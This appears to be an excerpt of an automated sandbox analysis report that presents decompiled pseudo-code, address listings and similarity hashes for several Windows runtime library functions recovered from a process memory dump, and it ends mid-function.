                                          0x010dfc65
                                          0x010dfc67
                                          0x010dfc6e
                                          0x010dfc72
                                          0x010dfc72
                                          0x010dfc72
                                          0x010dfc72
                                          0x010dfc67
                                          0x010dfc61
                                          0x00000000
                                          0x010dfc5a
                                          0x010dfc49
                                          0x010dfc41
                                          0x010dfc30
                                          0x010dfc27
                                          0x010dfc03
                                          0x010dfbcd
                                          0x010dfbd3
                                          0x010dfbd9
                                          0x010dfbdc
                                          0x010dfbde
                                          0x010dfc99
                                          0x010dfc9b
                                          0x010dfc9d
                                          0x010dfcd5
                                          0x010dfcd5
                                          0x010dfc89
                                          0x010dfc89
                                          0x00000000
                                          0x010dfc9f
                                          0x010dfc9f
                                          0x010dfca3
                                          0x00000000
                                          0x010dfca3
                                          0x00000000
                                          0x010dfbe4
                                          0x010dfbe4
                                          0x010dfbe4
                                          0x010dfbe4
                                          0x010dfbe9
                                          0x010dfbf2
                                          0x00000000
                                          0x010dfbf2
                                          0x010dfbde
                                          0x010dfbcb
                                          0x010dfbab
                                          0x010dfc8b
                                          0x010dfc8b
                                          0x010dfc8c
                                          0x010dfb80
                                          0x010dfb72
                                          0x010dfb5e
                                          0x010dfc8d
                                          0x010dfc91
                                          0x010dfadf
                                          0x010dfadf
                                          0x010dfae1
                                          0x010dfae4
                                          0x010dfae7
                                          0x010dfaec
                                          0x010dfaf8
                                          0x010dfb00
                                          0x010dfb07
                                          0x010dfb0f
                                          0x010dfb0f
                                          0x010dfb07
                                          0x00000000
                                          0x010dfaf8
                                          0x010dfadd

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0111BE0F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: 056f6a253bc53197cb540744078cef95947f1d98d5c701b96aff0a15db017774
                                          • Instruction ID: 2cd0bed982ab2230fa606f4a06f2950669f50f6e07cf3b302543971f488bb916
                                          • Opcode Fuzzy Hash: 056f6a253bc53197cb540744078cef95947f1d98d5c701b96aff0a15db017774
                                          • Instruction Fuzzy Hash: 86A10431B0070B8BEB29DB68C5507BEB7B5AF48724F048579E997DB684DB30D842CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E010A2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1195350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1197bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E010E97C0();
				}
				if( *0x11979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x11979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E010D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E010C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0113FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E010E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E010DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L010FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1196901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1196901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E010E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E010E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E010C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E010C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01127016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0113FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1195350;
							if(_t109 != 0x1195350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0113FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01135720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                          0x010a2d8a
                                          0x010a2d8a
                                          0x010a2d92
                                          0x010a2d96
                                          0x010a2d9e
                                          0x010a2da0
                                          0x010a2da3
                                          0x010a2da5
                                          0x010a2da8
                                          0x010a2dab
                                          0x010a2db2
                                          0x010ff9aa
                                          0x010ff9ab
                                          0x010ff9ae
                                          0x010ff9ae
                                          0x010a2db8
                                          0x010a2dc2
                                          0x010ff9b9
                                          0x010ff9be
                                          0x010ff9bf
                                          0x010ff9bf
                                          0x010a2dcf
                                          0x010ff9c9
                                          0x010a2dd5
                                          0x010a2dd5
                                          0x010a2dd5
                                          0x010a2dde
                                          0x010a2de1
                                          0x010a2e70
                                          0x010a2e72
                                          0x010a2e72
                                          0x010a2de7
                                          0x010a2deb
                                          0x010a2e7c
                                          0x010a2e83
                                          0x010a2e85
                                          0x010a2e8b
                                          0x010a2e8d
                                          0x010a2e92
                                          0x010a2e92
                                          0x010a2e85
                                          0x010a2df1
                                          0x010a2df7
                                          0x010a2df9
                                          0x010a2df9
                                          0x010a2dfc
                                          0x010a2dff
                                          0x010a2e02
                                          0x00000000
                                          0x010a2e05
                                          0x010a2e0c
                                          0x010ff9d9
                                          0x010a2e12
                                          0x010a2e12
                                          0x010a2e12
                                          0x010a2e1a
                                          0x010ff9e3
                                          0x010ff9e9
                                          0x010ff9f0
                                          0x010ff9f6
                                          0x010ff9f8
                                          0x010ff9f8
                                          0x010ff9f0
                                          0x010a2e23
                                          0x010ffa02
                                          0x010ffa03
                                          0x010ffa05
                                          0x010ffa06
                                          0x00000000
                                          0x010a2e29
                                          0x010a2e29
                                          0x010a2e2e
                                          0x010a2e34
                                          0x010a2e3e
                                          0x00000000
                                          0x00000000
                                          0x010a2e44
                                          0x010a2e47
                                          0x010a2e4d
                                          0x00000000
                                          0x00000000
                                          0x010a2e4f
                                          0x010a2e54
                                          0x00000000
                                          0x00000000
                                          0x010a2e5a
                                          0x010a2e5f
                                          0x010a2e9a
                                          0x010a2ea4
                                          0x010a2ea5
                                          0x010a2ea8
                                          0x010a2eaf
                                          0x010a2eb2
                                          0x010a2eb5
                                          0x010ffae9
                                          0x010ffaeb
                                          0x010ffaed
                                          0x010ffaef
                                          0x010ffaf7
                                          0x010ffaf8
                                          0x010ffafd
                                          0x010ffaff
                                          0x010ffb04
                                          0x010ffb04
                                          0x010ffaff
                                          0x010a2ec0
                                          0x010a2ec4
                                          0x010a2ec6
                                          0x010a2ec8
                                          0x010ffb14
                                          0x010ffb18
                                          0x010ffb1e
                                          0x010ffb21
                                          0x010ffb21
                                          0x010a2ece
                                          0x010a2ece
                                          0x010a2ece
                                          0x010a2ed7
                                          0x010a2e61
                                          0x010a2e63
                                          0x010ffa6b
                                          0x010ffa71
                                          0x010ffa76
                                          0x010ffa78
                                          0x010ffa8a
                                          0x010ffa7a
                                          0x010ffa83
                                          0x010ffa83
                                          0x010ffa8f
                                          0x010ffa91
                                          0x010ffa97
                                          0x010ffa9d
                                          0x010ffaa4
                                          0x010ffaaa
                                          0x010ffaaf
                                          0x010ffab1
                                          0x010ffac3
                                          0x010ffab3
                                          0x010ffabc
                                          0x010ffabc
                                          0x010ffac8
                                          0x010ffacb
                                          0x010ffadf
                                          0x010ffadf
                                          0x010ffacb
                                          0x010ffaa4
                                          0x010ffa91
                                          0x010a2e6f
                                          0x010a2e6f
                                          0x010a2e5f
                                          0x010ffa13
                                          0x010ffa15
                                          0x010ffa17
                                          0x010ffa1f
                                          0x010ffa21
                                          0x010ffa22
                                          0x010ffa25
                                          0x010ffa28
                                          0x010ffa2f
                                          0x010ffa2f
                                          0x010ffa2a
                                          0x010ffa2a
                                          0x010ffa2a
                                          0x010ffa31
                                          0x010ffa34
                                          0x010ffa36
                                          0x010ffa3c
                                          0x010ffa3e
                                          0x010ffa41
                                          0x010ffa43
                                          0x010ffa45
                                          0x010ffa45
                                          0x010ffa41
                                          0x010ffa3c
                                          0x010ffa4a
                                          0x010ffa4f
                                          0x010ffa51
                                          0x010ffa53
                                          0x010ffa56
                                          0x010ffa5b
                                          0x010ffa5e
                                          0x00000000
                                          0x010ffa5e
                                          0x010a2e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 3f859c1b2d44a438918f4a82511eb0a62aaa29379477dd0ed0f63cb13bd8eab8
                                          • Instruction ID: 7605e026116bd337f09eeb5f35ae591ee52d9c5b4c91a10023b96fe2c8342085
                                          • Opcode Fuzzy Hash: 3f859c1b2d44a438918f4a82511eb0a62aaa29379477dd0ed0f63cb13bd8eab8
                                          • Instruction Fuzzy Hash: A3614472A00606AFDB32DFACC841BBEBBE5EB44714F1402A9D6D1A76C1D7349D41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01170EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E01170EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0116FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01171074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E010E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0116A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0116A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1198b04 >> 0x14) + (_v44 -  *0x1198b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E010C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0116138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E010C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0115FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1198724 & 0x00000008) != 0) {
						E011652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E011715B5(0x1198ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                          0x01170eb7
                                          0x01170eb9
                                          0x01170ec0
                                          0x01170ec2
                                          0x01170ecd
                                          0x0117105b
                                          0x0117105b
                                          0x01171061
                                          0x01171066
                                          0x01171066
                                          0x0117106b
                                          0x01171073
                                          0x01171073
                                          0x01170ed3
                                          0x01170ed6
                                          0x01170edc
                                          0x01170ee0
                                          0x01170ee7
                                          0x01170ef0
                                          0x01170ef5
                                          0x01170efa
                                          0x01170efc
                                          0x01170efd
                                          0x01170f03
                                          0x01170f04
                                          0x01170f06
                                          0x01170f07
                                          0x01170f09
                                          0x01170f0e
                                          0x01170f14
                                          0x01170f23
                                          0x01170f2d
                                          0x01170f34
                                          0x01170f34
                                          0x01170f14
                                          0x01170f52
                                          0x00000000
                                          0x00000000
                                          0x01170f58
                                          0x01170f73
                                          0x01170f74
                                          0x01170f79
                                          0x01170f7d
                                          0x01170f80
                                          0x01170f86
                                          0x01170fab
                                          0x01170fb5
                                          0x01170fc6
                                          0x01170fd1
                                          0x01170fe3
                                          0x01170fd3
                                          0x01170fdc
                                          0x01170fdc
                                          0x01170feb
                                          0x01171009
                                          0x01171009
                                          0x01171015
                                          0x01171027
                                          0x01171017
                                          0x01171020
                                          0x01171020
                                          0x0117102f
                                          0x0117103c
                                          0x0117103c
                                          0x01171048
                                          0x01171050
                                          0x01171050
                                          0x01171055
                                          0x00000000
                                          0x01171055
                                          0x01170f88
                                          0x01170f9e
                                          0x01170fa2
                                          0x01170fa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01170fa9
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: f88df441c49cbc2d4412c515fcacf327a99c8a8ffaf8a586cb250d3372aa149f
                                          • Instruction ID: 62890111070ef217f3f893bff178189a4c2fae683ed5f2845a4e30609ff17606
                                          • Opcode Fuzzy Hash: f88df441c49cbc2d4412c515fcacf327a99c8a8ffaf8a586cb250d3372aa149f
                                          • Instruction Fuzzy Hash: EF518C712083429BD329DF28D884B5BBBF9EBC9714F14092CFA9697390D771E905CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E010DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E010C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E010E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E010E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010E95D0();
							goto L11;
						} else {
							_t109 = L010C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E010EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                          0x010df0d3
                                          0x010df0d9
                                          0x010df0e0
                                          0x010df0e7
                                          0x010df0f2
                                          0x010df0f4
                                          0x010df0f8
                                          0x010df100
                                          0x010df108
                                          0x010df10d
                                          0x010df115
                                          0x010df116
                                          0x010df11f
                                          0x010df123
                                          0x010df124
                                          0x010df12c
                                          0x010df130
                                          0x010df134
                                          0x010df13d
                                          0x010df144
                                          0x010df14b
                                          0x010df152
                                          0x0111bab0
                                          0x0111bab0
                                          0x010df158
                                          0x010df158
                                          0x010df15a
                                          0x010df160
                                          0x010df165
                                          0x010df166
                                          0x010df16f
                                          0x010df173
                                          0x0111baa7
                                          0x0111baa7
                                          0x0111baab
                                          0x00000000
                                          0x010df179
                                          0x010df18d
                                          0x010df191
                                          0x0111baa2
                                          0x00000000
                                          0x010df197
                                          0x010df19b
                                          0x010df1a2
                                          0x010df1a9
                                          0x010df1af
                                          0x010df1b2
                                          0x010df1b6
                                          0x010df1b9
                                          0x010df1c4
                                          0x010df1d8
                                          0x010df1df
                                          0x010df1e3
                                          0x010df1eb
                                          0x010df1ee
                                          0x010df1f4
                                          0x010df20f
                                          0x0111bab7
                                          0x0111babb
                                          0x0111bacc
                                          0x0111bad1
                                          0x010df215
                                          0x010df218
                                          0x010df226
                                          0x010df22b
                                          0x00000000
                                          0x010df22b
                                          0x010df1f6
                                          0x010df1f6
                                          0x010df1f9
                                          0x010df1fb
                                          0x010df1fb
                                          0x010df1f4
                                          0x010df191
                                          0x010df173
                                          0x010df152
                                          0x010df203

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 7f4094023681efed04020158ad2723f6d3b9b9c3483f6633facea2a5a1b407b5
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 6D5180725047119FC321DF69C840A6BBBF4FF48710F00892DF99697650E7B4E915CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01123540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E01123540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x119d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E010E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01123706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E010EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01123540;
						E010EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E010FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01130C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010E97C0();
					}
					return E010EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01123971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01123884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E010EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E010E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01123787(_a4,  &_v352, _t80);
						}
					}
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                          0x01123552
                                          0x0112355a
                                          0x0112355d
                                          0x01123566
                                          0x01123567
                                          0x0112357e
                                          0x0112358f
                                          0x011235a1
                                          0x011235a5
                                          0x0112366b
                                          0x0112366b
                                          0x0112366d
                                          0x01123672
                                          0x01123679
                                          0x01123685
                                          0x0112368d
                                          0x0112369d
                                          0x011236a7
                                          0x011236b8
                                          0x011236c6
                                          0x011236c7
                                          0x011236dc
                                          0x011236e1
                                          0x011236e7
                                          0x011236e9
                                          0x011236e9
                                          0x01123703
                                          0x01123703
                                          0x011235b5
                                          0x011235c0
                                          0x011235c4
                                          0x00000000
                                          0x00000000
                                          0x011235ca
                                          0x011235d7
                                          0x011235e2
                                          0x011235e6
                                          0x011235e8
                                          0x011235f5
                                          0x011235fa
                                          0x01123603
                                          0x01123604
                                          0x01123609
                                          0x0112360a
                                          0x01123612
                                          0x01123613
                                          0x0112361e
                                          0x01123622
                                          0x01123628
                                          0x0112362f
                                          0x0112362f
                                          0x01123636
                                          0x01123638
                                          0x0112363b
                                          0x01123642
                                          0x01123642
                                          0x01123636
                                          0x01123657
                                          0x01123657
                                          0x0112365c
                                          0x01123662
                                          0x01123669
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 0f602e2fc6bcd20671032477e78e396edd8b6d0ec67a8df8ade0793ee6f55658
                                          • Instruction ID: 2b6a0c1ed96ec91c0c4cf97ee7359019c5dc203b0c8a29ff23491b236ef0b144
                                          • Opcode Fuzzy Hash: 0f602e2fc6bcd20671032477e78e396edd8b6d0ec67a8df8ade0793ee6f55658
                                          • Instruction Fuzzy Hash: 0C4143F1D1052D9EDF259A50CC84FDEB77CAB48718F0045A5EA58AB240DB349F988FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011705AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E011705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
